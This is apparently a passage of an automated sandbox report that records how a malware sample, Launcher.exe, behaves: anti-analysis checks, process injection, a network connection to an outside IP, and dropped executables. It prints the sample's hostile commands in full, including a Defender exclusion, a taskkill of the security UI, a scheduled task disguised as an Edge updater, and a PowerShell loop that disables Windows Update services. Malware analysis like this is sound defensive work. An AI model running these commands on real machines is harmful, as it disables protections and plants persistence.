                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1832Thread sleep count: 3491 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1832Thread sleep count: 425 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2552Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 60Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1712Thread sleep count: 6710 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1712Thread sleep count: 2908 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2552Thread sleep count: 7960 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep count: 1728 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 576Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe TID: 2296Thread sleep time: -210000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe TID: 4992Thread sleep count: 4242 > 30
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe TID: 1712Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428Thread sleep count: 3904 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 576Thread sleep count: 178 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6060Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2592Thread sleep count: 3066 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6116Thread sleep count: 89 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3032Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836Thread sleep count: 2868 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4020Thread sleep count: 1358 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2716Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\timeout.exe TID: 3756Thread sleep count: 35 > 30
                      Source: C:\Windows\System32\timeout.exe TID: 2504Thread sleep count: 36 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5048Thread sleep count: 2891 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4912Thread sleep count: 908 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4996Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4736Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0021FCDE FindFirstFileExW,28_2_0021FCDE
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0021FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_0021FD8F
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0021FCDE FindFirstFileExW,29_2_0021FCDE
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0021FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_0021FD8F
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: svchost.exe, 00000005.00000002.2498813732.000001617CE64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000es
                      Source: svchost.exe, 00000005.00000002.2498074264.000001617CE4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                      Source: svchost.exe, 00000005.00000002.2497642543.000001617CE27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: svchost.exe, 00000005.00000002.2498813732.000001617CE81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000005.00000002.2497642543.000001617CE27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}a
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1424697128.0000000001548000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1598928091.0000000001548000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.2384299612.0000000001548000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000005.00000002.2496518052.000001617CE02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                      Source: svchost.exe, 00000005.00000002.2499410666.000001617CF02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000005.00000002.2498074264.000001617CE4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeAPI call chain: ExitProcess graph end nodegraph_29-53346
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_001A553B _strlen,GetModuleHandleA,GetProcAddress,VirtualProtect,LdrInitializeThunk,OleDraw,GetModuleHandleA,GetProcAddress,OleDraw,FreeConsole,__fread_nolock,_strlen,_strlen,FreeConsole,__fread_nolock,FreeConsole,__fread_nolock,28_2_001A553B
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0020DC9E
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_002361B4 mov edi, dword ptr fs:[00000030h]28_2_002361B4
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_00930277 mov eax, dword ptr fs:[00000030h]30_3_00930277
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_00930277 mov eax, dword ptr fs:[00000030h]30_2_00930277
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0021B71C GetProcessHeap,28_2_0021B71C
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0020D8E2
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020DC92 SetUnhandledExceptionFilter,28_2_0020DC92
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0020DC9E
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_00215DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00215DCE
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0020D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_0020D8E2
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0020DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0020DC9E
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00215DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00215DCE
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.236.26.111 5968
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_002361B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,28_2_002361B4
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeMemory written: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe base: 400000 value starts with: 4D5A
                      Sets debug register (to hijack the execution of another thread)
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeThread register set: 4284 501
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector""Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "net session"Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe C:\Users\user\AppData\Local\wxymrnibweqciwn.exeJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'""Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-WmiObject Win32_PortConnector"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net sessionJump to behavior
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 sessionJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeProcess created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe "C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe"
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist"
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Get-WmiObject Win32_PortConnector"
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C timeout 5 && del "C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 /nobreak
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 472 -p 6972 -ip 6972
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6972 -s 136
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$services = @(\"wuauserv\",\"usosvc\",\"bits\",\"dosvc\",\"waasmedicsvc\"); foreach ($svc in $services) { stop-service $svc -erroraction silentlycontinue -force; set-service $svc -startuptype disabled -erroraction silentlycontinue; }"
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$services = @(\"wuauserv\",\"usosvc\",\"bits\",\"dosvc\",\"waasmedicsvc\"); foreach ($svc in $services) { stop-service $svc -erroraction silentlycontinue -force; set-service $svc -startuptype disabled -erroraction silentlycontinue; }"
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$services = @(\"wuauserv\",\"usosvc\",\"bits\",\"dosvc\",\"waasmedicsvc\"); foreach ($svc in $services) { stop-service $svc -erroraction silentlycontinue -force; set-service $svc -startuptype disabled -erroraction silentlycontinue; }"
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: EnumSystemLocalesW,28_2_0021B007
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,28_2_0021F048
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: EnumSystemLocalesW,28_2_0021F299
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,28_2_0021F334
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: EnumSystemLocalesW,28_2_0021F587
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetLocaleInfoW,28_2_0021F5E6
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: EnumSystemLocalesW,28_2_0021F6BB
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetLocaleInfoW,28_2_0021F706
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_0021F7AD
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetLocaleInfoW,28_2_0021F8B3
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetLocaleInfoW,28_2_0021AB0C
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: EnumSystemLocalesW,29_2_0021B007
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,29_2_0021F048
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetLocaleInfoW,29_2_0021F8B3
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: EnumSystemLocalesW,29_2_0021F299
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,29_2_0021F334
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetLocaleInfoW,29_2_0021AB0C
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: EnumSystemLocalesW,29_2_0021F587
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetLocaleInfoW,29_2_0021F5E6
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: EnumSystemLocalesW,29_2_0021F6BB
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetLocaleInfoW,29_2_0021F706
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,29_2_0021F7AD
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\Desktop\Launcher.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe VolumeInformationJump to behavior
